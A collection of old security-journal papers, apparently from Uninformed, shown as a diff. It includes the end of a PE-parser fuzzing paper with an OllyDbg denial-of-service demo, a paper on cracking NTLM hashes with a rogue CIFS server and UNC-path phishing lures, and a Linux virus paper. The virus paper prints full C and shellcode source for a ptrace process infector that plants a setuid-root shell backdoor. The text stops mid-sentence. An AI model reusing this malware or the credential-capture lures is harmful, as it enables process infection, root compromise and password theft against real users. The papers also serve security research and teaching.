are rather minimal considering the number of structures and elements
accompanied by the PE/COFF specification, however it is enough to
demonstrate how broken, binary parsers can be.
+--------------+-----------------+-------------------+
| Tool Name | Vendor | Section |
+--------------+-----------------+-------------------+
| PE View | Wayne Radburn | All |
| MSVS bindump | Microsoft | All |
| OllyDbg | Oleh Yuschuk | NumberOfFunctions |
| PE Explorer | Haeventools.com | NumberOfSections |
+--------------+-----------------+-------------------+
= Affected Toolsets
Although I can almost guarantee other parsers are just as buggy,
this selection is pretty well known and should suffice as a
demonstration. The only issue I will elaborate on is the OllyDebug
denial of service attack. This issue is interesting due to the fact
that even after modifying the PE Image to DoS OllyDebug, the binary
itself is still executable. This can be leveraged as an attack
vector against reverse engineerers who rely on olly debug to reverse
binaries. The following is a run of breakdance against a DLL.
(xbud@yakuza <~/code/random>) $./breakdance -v -e 4294967295 -f \
/home/xbud/code/libpe/testbins/vncdll.dll -o vnc.dll
...
NumberOfFunctions 58, NumberOfNames: 58, now 2147483647,2147483647
Dumping 348160 bytes
(xbud@yakuza <~/code/random>) $
-- Inside WinDbg --
This exception may be expected and handled.
eax=005d44d0 ebx=0000049c ecx=005d46c8 edx=000001f8 esi=01ed0465 edi=00000000
eip=0045cda4 esp=0012e70c ebp=0012ede8 iopl=0 nv up ei ng nz ac pe cy
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000293
*** WARNING: Unable to verify checksum for C:\tools\odbg110\OLLYDBG.EXE
*** ERROR: Symbol file could not be found. Defaulted to export symbols for
C:\tools\odbg110\OLLYDBG.EXE -
OLLYDBG!Createlistwindow+0x1bb4:
0045cda4 668b0459 mov ax,[ecx+ebx*2] ds:0023:005d5000=????
0:000> kb
ChildEBP RetAddr Args to Child
WARNING: Stack unwind information not available. Following frames may be wrong.
0012ede8 0045f7eb 01ed0465 76bf1f1c 76bf2075 OLLYDBG!Createlistwindow+0x1bb4
00000000 00000000 00000000 00000000 00000000 OLLYDBG!Decoderange+0x180b
= Conclusions
The general rule of thumb here is not to trust any user modifiable
data. The trust between application and input components such as
sockets, file I/O, named pipes etc. should always be minimal and at
an extreme, should be considered dangerous. The fact that a file
format specification exists is not an excuse to assume all data
gathered from an alleged file is valid. Validate your input against
a working ruleset, and if the assertion fails, raise an exception.
Keeping your code simple means accept only valid input, deny all
variants.
All the code referenced is provided in the attached tar ball, a
safer version of the library for parsing the hypothetical file
format developed for this paper is included for demonstration
purposes.
= Bibliography
OSVDB. OSVDB Advisory Descriptions
http://www.osvdb.org
Microsoft Corporation. PECoff Specification
http://www.microsoft.com/whdc/system/platform/firmware/PECOFF.mspx
blexim. Integer Overflows
http://www.phrack.org/show.php?p=60&a=10

458
uninformed/3.4.txt Normal file
View File

@ -0,0 +1,458 @@
Attacking NTLM with Precomputed Hashtables
warlord
warlord@nologin.org
1) Introduction
Breaking encrypted passwords has been of interest to hackers for a long
time, and protecting them has always been one of the biggest security
problems operating systems have faced, with Microsoft's Windows being no
exception. Due to errors in the design of the password encryption
scheme, especially in the LanMan(LM) scheme, Windows has a bad track in
this field of information security. Especially in the last couple of
years, where the outdated DES encryption algorithm that LanMan is based
on faced more and more processing power in the average household,
combined with ever increasing harddisk size, made it crystal clear that
LanMan nowadays is not just outdated, but even antiquated.
Until now, breaking the LanMan hashed password required somehow
accessing the machine first of all, and grabbing the password file,
which didn't render remote password breaking impossible, but as a remote
attacker had to break into the system first to get the required data, it
didn't matter much. This paper will try to change this point of view.
2) The design of LM and NTLM
2.1) The LanMan disaster
By default Windows stores all users passwords with two different hashing
algorithms. The historically weak LanMan hash and the more robust MD4.
The LanMan hash is based on DES and has been described in Mudge's rant
on the topic. A brief recap of the LM hash is below, though those
unfamilliar with LM will probably want to read.
First of all, Windows takes a password and makes sure it's 14 bytes
long. If it's shorter than 14 bytes, the password is padded with null
bytes. Brute forcing up to 14 characters can take a very long time, but
two factors make this task way more easy. First, not only is the set of
possible characters rather small, Microsoft further reduces it by making
sure a password is stored all uppercase. That means "test" is the same
as "Test" is the same as "tesT" is the same as...well...you get the
idea. Second, the password is not really 14 bytes in size. Windows
splits it up into two times 7 bytes. So instead of having to brute force
up to 14 bytes, an attacker only has to break 7 bytes, twice. The
difference is (keyspace^14) versus (keyspace^7)*2. That's a huge
difference.
Concerning the keyspace, this paper focuses on the alphanumerical set of
characters only, but the entire possible set of valid characters is:
ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 %!@\#$%^&*()_-=+`~[]\{}|\:;"'<>,.?/
The next problem with LM stems from the total lack of salting or cipher
block chaining in the hashing process. To hash a password the first 7
bytes of it are transformed into an 8 byte odd parity DES key. This key
is used to encrypt the 8 byte string "KGS!@". Same thing happens with
the second part of the password.
This lack of salting creates two interesting consequences. Obviously
this means the password is always stored in the same way, and just begs
for a typical lookup table attack. The other consequence is that it is
easy to tell if a password is bigger than 7 bytes in size. If not, the
last 7 bytes will all be null and will result in a constant DES hash of
0xAAD3B435B51404EE.
As I already pointed out, LM has been extensively documented.
"L0phtcrack" and "John the Ripper" are both able brute force tools to
break these hashes, and Philippe Oechslin of the ETH Zuerich was the
first to precompute LM lookup tables that allow breaking these hashes in
seconds.
2.2) NTLM
Microsoft attempted to address the shortcomings of LM with NTLM. Windows
NT introduced the NTLM(NT LanManager) authentication method to provide
stronger authentication. The NTLM protocol was originally released in
version 1.0(NTLM), and was changed and fortified in NT SP6 as NTLMv2.
When exchanging files between hosts in a local area network, printing
documents on a networked printer or sending commands to a remote system,
Windows uses a protocol called CIFS - the Common Internet File System.
CIFS uses NTLM for authentication.
In NTLM, the protocol covered in this document, the authentication works
in the following manner. When the client connects to the server and
requests a new session, the server replies with a positive session
response. Next, the client sends a request to negotiate a protocol for
one of the many dialects of the SMB/CIFS family by providing a list of
dialects that it understands. The server picks the best out of those and
sends the client a response that names the protocol to use, and includes
a randomly generated 8 byte challenge.
In order to log in now, the client sends the username in plaintext(!),
and also the password, hashed NTLM style. The NTLM hash is generated in
the following manner:
[UsersPassword]->[LMHASH]->[NTLM Hash]
The NTLM hash is produced by the following algorithm. The client takes
the 16 byte LM hash, and appends 5 null bytes, so that the result is a
string of 21 bytes length. Then it splits those 21 bytes into 3 groups
of 7 bytes. Each 7 byte string is turned into an 8 byte odd parity DES
key once again. Now the first key is used to encrypt the challenge with
the DES algorithm, producing an 8 byte hash. The same is done with keys
2 and 3, so that there are two additional 8 byte hashes. These 3 hashes
are simply concatenated, resulting in a single 24 byte hash, which is
the one being sent by the client as the encrypted password.
Mudge already pointed out why this is really stupid, and I'll just
recapitulate his reasons here. An attacker capable of sniffing traffic
can see the username, the challenge and the 24 byte hash.
First of all, as stated earlier, if the password is less than 8 bytes,
the second half of the LM hash always is 0xAAD3B435B51404EE. For the
purpose of illustration, let's assume the first part of the hash is
0x1122AABBCCDDEEFF. So the entire LM hash looks like:
-------------------------------------------
| 0x1122AABBCCDDEEFF | 0xAAD3B435B51404EE |
-------------------------------------------
When transforming this into an NTLM hash, the first 8 bytes of the new
hash are based solely on the first 7(!) bytes of the LM hash. The second
8 byte chunk of the NTLM hash is based on the last byte of the first LM
hash, and first 6 bytes of the second LM hash. Now there are 2 bytes of
the second LM hash left. Those two, padded with 5 null bytes and used to
encrypt the challenge, form the third 8 byte chunk of the NTLM hash.
That means in the example this padded LM hash
------------------------------------------------------
| 0x1122AABBCCDDEE | FFAAD3B435B514 | 04EE0000000000 |
------------------------------------------------------
is being turned into the 24 byte NTLM hash. If the password is smaller
than 8 characters in size, the third part, before being hashed with the
challenge to form the NTLM hash, will always look like this. So in order
to test wether the password is smaller than 8 bytes, it's enough to take
this value, the 0x04EE0000000000, and use it to encrypt the challenge
that got sniffed from the wire. If the result equals the third part of
the NTLM hash which the client sent to the server, it's a pretty safe
bet to say the password is no longer than 7 chars. It's even possible to
make sure it is. Assuming from the previous result that the second LM
hash looks like 0xAAD3B435B51404EE, the second chunk of the 24 byte NTLM
hash is based on 0x??AAD3B435B514. The only part unknown is the first
byte, as this one is based on the first LM hash. One byte, thats 256
permutations. By brute forcing those up to 256 possibilities as the
value of the first byte, and using the resulting key to encrypt the
known challenge once again, one should eventually stumble over a result
that's the same as the second 8 bytes of the NTLM hash. Now one can rest
assured, that the password really is smaller than 8 bytes. Even if the
password is bigger than 7 bytes, and the second LM hash does not end
with 0x04EE thus, creating all possible 2 byte combinations, padding
them with 5 null bytes and hashing those with the challenge until the
final 8 byte chunk of the NTLM hash matches will easily reveal the final
2 byte of the LM hash, with no more than up to 64k permutations.
2.3) The NTLM challenge
The biggest difference between the way the LM and the NTLM hashing
mechanism works is the challenge. In NTLM the challenge acts like a a
salt in other cryptographic implementations. This throws a major wrench
in our pre-computing table designs, adding 2^64 permutations to the
equation.
3.0) Breaking NTLM with precomputed tables
3.1) Attacking the first part
Precomputing tables for NTLM has just been declared pretty much
impossible with todays computing resources. The problem is pre-computing
every possible hash value (and then, of course storing those values even
if computation was possible). By applying a trick to remove the
challenge from the equation however, precomputing NTLM hashes becomes
almost as easy as the creation of LM tables. By writing a rogue CIFS
server that hands out the same static challenge to every client that
tries to connect to it, the problem has static values all over the place
once again, and hashtable precomputation becomes possible.
The following screenshot depicts a proof of concept implementation that
accepts an incoming CIFS connection, goes through the protocol
negotiation phase with the connecting client, sends out the static
challenge, and disconnects the client after receiving username and NTLM
hash from it. The server also logs some more information that the client
conveniently sends along.
IceDragon wincatch bin/wincatch
This is Alpha stage code from nologin.org
Distribution in any form is denied
Src Name: BARRIERICE
IP: 192.168.7.13
Username: Testuser
Primary Domain: BARRIERICE
Native OS: Windows 2002 Service Pack 2 2600
Long Password Hash: 3c19dcbdb400159002d8d5f8626e814564f3649f0f918666
That's a Windows XP machine connecting to the rogue server running
on Linux. The client is connecting from IP address 192.168.7.13. The
username is ``Testuser'', the name of the host is ``BarrierIce'',
and the password hash got captured too of course.
3.2) Table creation
The creation of rainbow tables to precompute the hashes is a good
approach to easily breaking the hashes now, but as harddisks grow bigger
and bigger while costing ever less, I decided to roll my own table
layout instead. As the reader will see, my approach requires way more
harddisk space than rainbow tables do since they are computationally
less expensive to create and contain a determined set of data, unlike
rainbow tables with their less than 100 probability approach to contain
a certain password.
In order to create those tables, the big question is how to efficiently
store all the data. In order to stay within certain bounds, I decided to
stick to alphanumeric tables only. Alphanumeric, that's 26 chars from
a-z, 26 chars from A-Z, and additional 10 for 0-9. Thats 62 possible
values for each character, so thats 62^7 permutations, right? Wrong.
NTLM hashes use the LM hash as input. The LM hashing algorithm
upper-cases its input. Therefore the possible keyspace shrinks to 36
characters, and the number of possible permutations goes down to 36^7.
The only other input that needs accounting is the NULL padding bytes
used, bringing the total permutations to a bit more than 36^7.
The approach taken here to allow for easy storage and recovery of hashes
and plain text is essentially to place every possible plaintext password
into one of 2048 buckets. It could easily be expanded to more. The table
creation tool simply generates every valid alphanumeric password, hashes
it and checks the first 11 bits of the hash. These bits determine which
of the 2048 buckets (implemented as files in this case) the plaintext
password belongs to. The plaintext password is then added to the bucket.
Now whenever a hash is captured, looking at the first 11 bits of the
hash determines the correct bucket to look into for the password. All
that's left to do now is hashing all the passwords in the bucket until a
match is found. This will take on average case ((36^7)/2048))/2, or
19131876 hash operations. This takes approximately three minutes on my
Pentium 4 2.8 Ghz machine. It takes the NTLM table generation tool 94
hours to run on my machine. Fortunately, I only had to do that once :)
The question is how to store more than 36^7 plaintext passwords, ranging
in size from 0(empty password) to 7 bytes.
Approach 1: Store each password separated by newlines. As most passwords
are 7 byte in size and an additional newline extends that to 8 byte, the
outcome would be somewhere around (36^7)*8 bytes. That's roughly 584
gigabytes, for the alphanumeric keyspace. There has to be a better way.
Approach 2: By storing each password with 7 bytes, be it shorter than 7
or not, the average space required for each password goes down from 8 to
7, as it's possible to get rid of the newlines. There's no need to
separate passwords by newlines if they're all the same size. (36^7)*7 is
still way too much though.
Approach 3: The plaintext passwords are generated by 7 nested loops. The
first character changes all the time. The second character changes every
time the first has exhausted the entire keyspace. The third increments
each time the second has exhausted the keyspace and so on. What's
interesting is that the final 3 bytes rarely change. By storing them
only when they change, it's possible to store only the first 4 bytes of
each password, and once in a while a marker that signals a change in the
final 3 bytes, and is followed by the 3 byte that now form the end of
each plaintext password up to the next marker. That's roughly (36^7)*4
bytes = 292 gigabytes. Much better. Still too much.
Approach 4: For each character, there's 37 possible values. A-Z, 0-9 and
the 0 byte. 37 different values can be expressed by 6 bits. So we can
stuff 4 characters into 4*6 = 24 bits, which is 3 byte. How convenient!
(37^7)*3 == 265 gigabytes. Still too much.
Approach 5: The passwords are being generated and stored in a
consecutive way. The hash determines which bucket to place each new
plaintext password into, but it's always 'bigger' than the previous one.
Using 2048 buckets, a test showed that, within any one file, no offset
between a password being stored and the next one stored into this bucket
exceeded 55000. By storing offsets to the previous password instead of
the full word, each password can be stored as a 2 byte value.
For example, say the first password stored into one bucket is the one
char word "A". That's index 10 in the list of possible characters, as it
starts with 0-9. The table creation tool would now save 10 into the
bucket, as it's the first index from the start of the new bucket, and
it's 10 bigger than zero, the start value for each bucket. Now if by
chance the one character password "C" was to be stored into the same
bucket next, the number 2 would be stored, as "C" has an offset of 2 to
the previous password. If the next password for this bucket was "JH6",
the offset might be 31337.
Basically each password is being stored in a base36 system, so the first
2 byte password, being "00", has an index of 37, and all the previous
password offsets and the offset for "00" itself of the bucket that "00"
is being stored in add up to 37. To retrieve a password saved in this
way requires a transformation of the decimal index back into the base36
system, and using the resulting individual numbers as indexes into the
char keyspace[].
The resulting table size is (36^7 )*2 == 146 gigabytes. Still pretty
big, but small enough to easily fit on today's harddisks. As I mentioned
earlier the actual resulting size is a bit bigger in fact, as a bunch of
passwords that end with null bytes have to be stored too. In the end
it's not 146 gigabytes, but 151 instead.
3.3) The big problem
Now there's a big problem concerning the creation of the NTLM lookup
tables. The first 8 byte of the final hash are derived from the first 7
byte of the LM hash, which are derived from the first 7 byte of the
plaintext password. Creating tables to match the first 8 byte of the
NTLM hash to the first 7 bytes of the password is thus possible, but the
same tables do not work for the second or even third block of the 24
byte NTLM hash.
The second 8 byte chunk of the hash is derived from the last byte of the
first LM hash, and the first 6 byte of the second LM hash. This first
byte adds 256 possible values to the second LM hash. While the first 8
byte chunk of the 24 byte LM hash stems purely from a LM hash of a
plaintext password, the second 8 byte chunk stems from an undetermined
byte and additional 6 byte of a LM hash.
Being able to look up the first up to 7 bytes of the password is a big
advantage already though. The second part of the password, if it's
longer than 7 bytes at all, can now usually be easily guessed or brute
forced. Having determined that the password starts with "ILLUSTR" for
example, most often it may end with "ATION" or "ATOR". On the other
hand, when applying the brute force approach to this example after
looking up the first 7 bytes, it'd require to brute force 4-5 characters
until the final password is revealed. Even off-the-shelf hardware does
this in seconds. While taking a bit longer, even brute forcing 6 bytes
is nothing one couldn't sit out. 7 bytes, however, requires an
inconvenient amount of time. That's where being able to look that part
up as well would really come in handy. Well, guess what. There is a way.
3.4) Breaking the second part of the password
As described earlier in this paper, the second part of the password,
just as the first one, is used to encrypt a known string to form an 8
byte LM hash. Knowing the challenge sent from the server to the client,
it is possible to deduce the final 2 bytes of that LM hash out of the
third chunk of the NTLM hash. Doing so was explained in section 2.2.
So the final 2 byte of the LM hash of the second half of the original
password are known. If a similar approach to breaking the first half of
the password is being applied now, looking up the second part of the
password as well becomes quite possible.
The key here is to create a set of precomputed LanMan tables that are
sorted by the final 2 bytes of the LM hash. So once the final 2 byte of
the LM hash are known, a file is thus identified that contains plaintext
passwords that when hashed result in a matching 2 byte sequence at the
end.
The second chunk of the NTLM hash is derived from 6 bytes that are the
start of the hash of one of the plaintext passwords out of the file that
just got identified, and a single byte, the first one, which is the
final byte of the first LM hash.
Considering the first part of the password broken, that byte is known.
So all that's left to do is hash all the possible passwords in the file,
fit the single known byte into the first position of a string and
concatenate this one with 6 bytes from the just created hash, hashing
those 7 bytes again and comparing the result to the second chunk of the
NTLM hash. If it matches, the second part of the password has been
broken too.
Even if looking up the first part of the password didn't prove
successful, the method may still be applied. The only change would be
that up to 256 possible values for the first byte would have to be
computed and tested as well.
What's really interesting to note here, is that the second set of
tables, the sorted LM tables, unlike the first set of NTLM tables, does
NOT depend on a certain challenge. It will work with just any challenge,
which is usually sniffed or aquired from the wire when the password hash
and the username are being taken.
4) How to get the victim to log into the rogue server?
The big question to answer is how one can get the victim to log into the
rogue server, thus exposing his username and password hash for the
attacker to break.
Approach 1: Sending a html mail that includes a link in the form of a
UNC path should do the trick, depending primarily on the sender's
rhetoric ability in getting his victim to click the link, and the mail
client to understand what it's expected to do. A UNC path is usually in
the form of 192.168.7.6share, where the IP address obviously specifies
the host to connect to, and ``share'' is a shared resource on that host.
Due to Microsoft always being concerned about comfort first, the
following will happen once the victim clicks the link on a Windows
machine. The OS will try to log into the specified resource. When asked
for a username and password, the client happily provides the current
user's username and his hashed password to the server in an effort to
try to log in with these credentials. No user interaction required. No
joke.
Approach 2: Getting the victim to visit a site that includes a UNC path
with Internet Explorer has the same result. An image tag like will do
the trick. IE will make Windows try to log into the resource in order to
get the image. Again, no user interaction is required. This trick does
not work with Mozilla Firefox by the way.
Approach 3: If the rogue server is part of the LAN, advertising it in
the network neighbourhood as "warez, porn, mp3, movie" - server should
result in users trying to log into it sooner or later. There's no way
anyone can withstand the power of the 4 elements!
There's plenty of other ways that the author leaves to the readers
imagination.
5) Things to remember
Once a hash has been received and successfully broken, it may still not
be the correct password, and accordingly not allow the attacker to log
into his victims machine. That's due to the password being hashed all
uppercase for LM, while the MD4 based second hash actually is case
sensitive. So a hash that's been deciphered as being "WELCOME" may
originally have been "Welcome" or "welcome" or even "wELCOME" or
"WeLcOme" or .. well, you get the idea. Then again, how many users
actually apply uncommon spelling schemes?
6) Covering it up
Having read this paper the reader should by now realize that NTLM,
an authentication mechanism that probably most computers on this
planet support, is actually a big threat to hosts and entire
networks. Especially with the recently discovered remote Windows
exploits that require valid accounts on the victim machines for the
attacker to log into first, a worm that makes people visit a
website, which in turn makes them log into a rogue server that
breaks the hash and automatically exploits the victim is a
frightening threat scenario.
Bibliography
Windows NT rantings from the L0pht
http://www.packetstormsecurity.org/Crackers/NT/l0phtcrack/l0phtcrack.rant.nt.passwd.txt
Making a Faster Cryptanalytic Time-Memory Trade-Off
http://lasecwww.epfl.ch/ oechslin/publications/crypto03.pdf

561
uninformed/3.5.txt Normal file
View File

@ -0,0 +1,561 @@
Linux Improvised Userland Scheduler Virus
Izik
izik@tty64.org
Last modified: 12/29/2005
1) Introduction
This paper discusses the combination of a userland scheduler and
runtime process infection for a virus. These two concepts complete
each other. The runtime process infection opens the door to invading
into other processes, and the userland scheduler provides a way to
make the injected code coexist with the original process code. This
allows the virus to remain stealthy and active inside an infected
process.
2) Scheduler, Who?
A scheduler, in particular a process scheduler is a kernel component
that selects which process to run next. The scheduler is the basis
of a multitasking operating system such as Linux. By deciding what
process can run, the scheduler is responsible for utilizing the
system the best way and giving the impression that multiple
processes are simultaneously executing. A good example of using the
scheduler in a virus, is when the fork() syscall is used to
spawn a child process for the virus to run in. But fork()
puts the child process out, thus it appears in the system process
list and could attract attention.
3) Userland Scheduler
An userland scheduler, as opposed to the kernel scheduler, runs
inside an application scope and deals with the application threads
and processes. The userland scheduler is still subject to the kernel
scheduler and meant to improve the application multi-threads
management. One of the major tasks that the scheduler performs is
context switching. Taking airtime from one thread to another.
Improvising a userland scheduler inside an infected process will
give the option of switching from the original process to the virus
and back, without attracting too much attention on the way.
4) Improvising a Userland Scheduler
An application that does implement a userland scheduler in it,
provides the functions and support to do so in the code. This is a
privilege that a virus could not easily implement smoothly. So
improvising takes places. This raises two major problems: how and
when. How to perform the context switching task within a code that
has no previous support, and when the userland scheduler code can
run to begin supervising this in the first place.
There are a few ways to do it. For example putting a hook on a
function is one way. Once the program will call the function that
has been hooked, the virus will activate and afterwards return control
to the program. But it's not an ideal solution as there is no
guarantee that the program will continue using it, and for how often
or long. In order to get a wider scope that could cover the entire
program, signals could be used.
Looking at the signal mechanism in Linux, it's similar to the
interrupts mechanism, in the way that that the kernel allows a
program to process a signal within any place in the program code
without any special preparation and resume back to the program flow
once the signal handler function is done. It gives a very good way
to perform context switching with little effort. This answers the
"how" question, in how to perform the context switching task, using
the signal handler function as the base function of the virus which
will be invoked while the SIGALRM signal will be processed.
Adopting the signal model to our needs is supported by the
alarm() syscall. The alarm() syscall allows the
process to schedule the alarm signal (SIGALRM) to be
delivered, thus making it kernel responsibility. Having the kernel
constantly delivering a signal to the process hosting the virus,
saves the virus the effort of doing it. This answers the when
question for when the userland scheduler code would run. Using the
alarm() syscall to schedule a SIGALRM to be
delivered to the process, that in turn will call the virus function.
This code demonstrates the functionality of alarm() and
SIGALRM:
/*
* sigalrm-poc.c, SIGALRM Proof of Concept
*/
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <signal.h>
// SIGALRM Handler
void shapebreaker(int ignored) {
// Break the cycle
printf("\nX\n");
// Schedule another one
alarm(5);
return ;
}
int main(int argc, char **argv) {
int shape_selector = 0;
char shape;
// Register for SIGALRM
if (signal(SIGALRM, shapebreaker) < 0) {
perror("signal");
return -1;
}
// Schedule SIGALRM for 5 secs
alarm(5);
while(1) {
// Shape selector
switch (shape_selector % 2) {
case 0:
shape = '.';
break;
case 1:
shape = 'o';
break;
case 2:
shape = 'O';
break;
}
// Print given shape
printf("%c\r", shape);
// Incerase shape index
shape_selector++;
}
// NEVER REACHED
return 1;
}
The program concept is pretty simple, it prints a char from a loop,
selecting the char via an index variable. Every five seconds or so,
a SIGALRM is being scheduled to be delivered using the
alarm() syscall. Once the signal has been processed the
signal handler, which is the shapebreaker() function in
this case, is being called and is breaking the char sequence.
Afterwards the program continues as if nothing happened. From within
the signal handler function, a virus can operate and once it
returns, the program will continue flawlessly.
5) Runtime Process Infection
Runtime infection is done using the notorious ptrace()
syscall, which allows a process to attach to another process,
assuming of course, that it has root privileges or has a
father-child relationship with some exceptions to it. Once the
attached process gets into debugging mode, it is possible to modify
its registers and write/read from its address space. These are
features that are required to slip in the virus code and activate
it. For an in-depth review of the ptrace() injection
method, refer to the "Building ptrace Injecting Shellcodes" article
in Phrack 59[1].
5.1) The Algorithm
Having the motives, tools and knowledge, here's the plan:
Infector:
---------
* Attach to process
> Wait for process to stop
> Query process registers
> Calculate previous stack page beginning
> Store current EIP
> Inject pre-virus and virus code
> Set EIP to pre-virus code
> Deattach from process
Pre-Virus:
----------
* Register SIGALRM signal
> Schedule SIGALRM (14secs)
> Give control back to process
Virus:
------
* SIGALRM handler invoked
> Check for /tmp/fluffy
> Create fluffy.c
> Compile fluffy.c
> Remove /tmp/fluffy.c
> Chmod /tmp/fluffy
> Jmp to pre-virus code
The infecting process is divided into two steps, the infector
injects the virus and the pre-virus code to the infected process.
Afterward it sets the process EIP to point to the pre-virus
code. This independently registers to the SIGALRM signal
within the infected process and calculates the virus location for
the signal callback function. Then it schedules a SIGALRM
signal and passes the control back to the process. Once the signal
caught the virus it kicks in as the signal handler.
5.2) Meet Fluffy
A code that implements the above theory:
/*
* x86-fluffy-virus.c, Fluffy virus / izik@tty64.org
*/
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <sys/ptrace.h>
#include <sys/wait.h>
#include <linux/user.h
#include <linux/ptrace.h>
char virus_shcode[] =
// <_start>:
"\x90" // nop
"\x90" // nop
"\x60" // pusha
"\x9c" // pushf
"\x31\xc0" // xor %eax,%eax
"\x31\xdb" // xor %ebx,%ebx
"\xb0\x30" // mov $0x30,%al
"\xb3\x0e" // mov $0xe,%bl
"\xeb\x06" // jmp <_geteip>
// <_calc_eip>:
"\x59" // pop %ecx
"\x83\xc1\x0d" // add $0xd,%ecx
"\xeb\x05" // jmp <_continue>
// <_geteip>:
"\xe8\xf5\xff\xff\xff" // call <_calc_eip>
// <_continue>:
"\xcd\x80" // int $0x80
"\x85\xc0" // test %eax,%eax
"\x75\x04" // jne <_resumeflow>
"\xb0\x1b" // mov $0x1b,%al
"\xcd\x80" // int $0x80
// <_resumeflow>:
"\x9d" // popf
"\x61" // popa
"\xc3" // ret
// <_virus>:
"\x55" // push %ebp
"\x89\xe5" // mov %esp,%ebp
"\x31\xc0" // xor %eax,%eax
"\x31\xc9" // xor %ecx,%ecx
"\xeb\x57" // jmp <_data_jmp>
// <_chkforfluffy>:
"\x5e" // pop %esi
// <_fixnulls>:
"\x3a\x46\x07" // cmp 0x7(%esi),%al
"\x74\x0b" // je <_access>
"\xfe\x46\x07" // incb 0x7(%esi)
"\xfe\x46\x0a" // incb 0xa(%esi)
"\xb0\xb3" // mov $0xb3,%al
"\xfe\x04\x06" // incb (%esi,%eax,1)
// <_access>:
"\xb0\xa8" // mov $0xa8,%al
"\x8d\x1c\x06" // lea (%esi,%eax,1),%ebx
"\xb0\x21" // mov $0x21,%al
"\xb1\x04" // mov $0x4,%cl
"\xcd\x80" // int $0x80
"\x85\xc0" // test %eax,%eax
"\x74\x31" // je <_schedule>
// <_fork>:
"\x01\xc8" // add %ecx,%eax
"\xcd\x80" // int $0x80
"\x85\xc0" // test %eax,%eax
"\x75\x1f" // jne <_waitpid>
// <_exec>:
"\x31\xd2" // xor %edx,%edx
"\xb0\x17" // mov $0x17,%al
"\x31\xdb" // xor %ebx,%ebx
"\xcd\x80" // int $0x80
"\xb0\x0b" // mov $0xb,%al
"\x89\xf3" // mov %esi,%ebx
"\x52" // push %edx
"\x8d\x7e\x0b" // lea 0xb(%esi),%edi
"\x57" // push %edi
"\x8d\x7e\x08" // lea 0x8(%esi),%edi
"\x57" // push %edi
"\x56" // push %esi
"\x89\xe1" // mov %esp,%ecx
"\xcd\x80" // int $0x80
"\x31\xc0" // xor %eax,%eax
"\x40" // inc %eax
"\xcd\x80" // int $0x80
// <_waitpid>:
"\x89\xc3" // mov %eax,%ebx
"\x31\xc0" // xor %eax,%eax
"\x31\xc9" // xor %ecx,%ecx
"\xb0\x07" // mov $0x7,%al
"\xcd\x80" // int $0x80
// <_schedule>:
"\xc9" // leave
"\xe9\x7c\xff\xff\xff" // jmp <_start>
// <_data_jmp>:
"\xe8\xa4\xff\xff\xff" // call <_chkforfluffy>
//
// /bin/sh\xff-c\xff
// echo "int main() { setreuid(0, 0); system(\"/bin/bash\"); return 1; }" > /tmp/fluffy.c ;
// cc -o /tmp/fluffy /tmp/fluffy.c ;
// rm -rf /tmp/fluffy.c ;
// chmod 4755 /tmp/fluffy\xff
//
// <_data_sct>:
"\x2f\x62\x69\x6e\x2f\x73\x68\xff\x2d\x63\xff\x65\x63\x68\x6f\x20"
"\x22\x69\x6e\x74\x20\x6d\x61\x69\x6e\x28\x29\x20\x7b\x20\x73\x65"
"\x74\x72\x65\x75\x69\x64\x28\x30\x2c\x20\x30\x29\x3b\x20\x73\x79"
"\x73\x74\x65\x6d\x28\x5c\x22\x2f\x62\x69\x6e\x2f\x62\x61\x73\x68"
"\x5c\x22\x29\x3b\x20\x72\x65\x74\x75\x72\x6e\x20\x31\x3b\x20\x7d"
"\x22\x20\x3e\x20\x2f\x74\x6d\x70\x2f\x66\x6c\x75\x66\x66\x79\x2e"
"\x63\x20\x3b\x20\x63\x63\x20\x2d\x6f\x20\x2f\x74\x6d\x70\x2f\x66"
"\x6c\x75\x66\x66\x79\x20\x2f\x74\x6d\x70\x2f\x66\x6c\x75\x66\x66"
"\x79\x2e\x63\x20\x3b\x20\x72\x6d\x20\x2d\x72\x66\x20\x2f\x74\x6d"
"\x70\x2f\x66\x6c\x75\x66\x66\x79\x2e\x63\x20\x3b\x20\x63\x68\x6d"
"\x6f\x64\x20\x34\x37\x35\x35\x20\x2f\x74\x6d\x70\x2f\x66\x6c\x75"
"\x66\x66\x79\xff";
int ptrace_inject(pid_t, long, void *, int);
int main(int argc, char **argv) {
pid_t pid;
struct user_regs_struct regs;
long infproc_addr;
if (argc < 2) {
printf("usage: %s <pid>\n", argv[0]);
return -1;
}
pid = atoi(argv[1]);
// Attach to the process
if (ptrace(PTRACE_ATTACH, pid, NULL, NULL) < 0) {
perror(argv[1]);
return -1;
}
// Wait for a process to stop
if (waitpid(pid, NULL, 0) < 0) {
perror(argv[1]);
ptrace(PTRACE_DETACH, pid, NULL, NULL);
return -1;
}
// Query process registers
if (ptrace(PTRACE_GETREGS, pid, &regs, &regs) < 0) {
perror("Oopsie");
ptrace(PTRACE_DETACH, pid, NULL, NULL);
return -1;
}
printf("Original ESP: 0x%.8lx\n", regs.esp);
printf("Original EIP: 0x%.8lx\n", regs.eip);
// Push original EIP on stack for virus to RET
regs.esp -= 4;
ptrace(PTRACE_POKETEXT, pid, regs.esp, regs.eip);
// Calculate the previous stack page top address
infproc_addr = (regs.esp & 0xFFFFF000) - 0x1000;
printf("Injection Base: 0x%.8lx\n", infproc_addr);
// Inject virus code
if (ptrace_inject(pid, infproc_addr, virus_shcode, sizeof(virus_shcode) - 1) < 0) {
return -1;
}
// Change EIP to point over virus shcode
regs.eip = infproc_addr + 2;
printf("Current EIP: 0x%.8lx\n", regs.eip);
// Set process registers (EIP changed)
if (ptrace(PTRACE_SETREGS, pid, &regs, &regs) < 0) {
perror("Oopsie");
ptrace(PTRACE_DETACH, pid, NULL, NULL);
return -1;
}
// It's fluffy time!
if (ptrace(PTRACE_DETACH, pid, NULL, NULL) < 0) {
perror("Oopsie");
return -1;
}
printf("pid #%d got infected!\n", pid);
return 1;
}
// Injection Function
int ptrace_inject(pid_t pid, long memaddr, void *buf, int buflen) {
long data;
while (buflen > 0) {
memcpy(&data, buf, 4);
if ( ptrace(PTRACE_POKETEXT, pid, memaddr, data) < 0 ) {
perror("Oopsie!");
ptrace(PTRACE_DETACH, pid, NULL, NULL);
return -1;
}
memaddr += 4;
buf += 4;
buflen -= 4;
}
return 1;
}
A few pointers about the code:
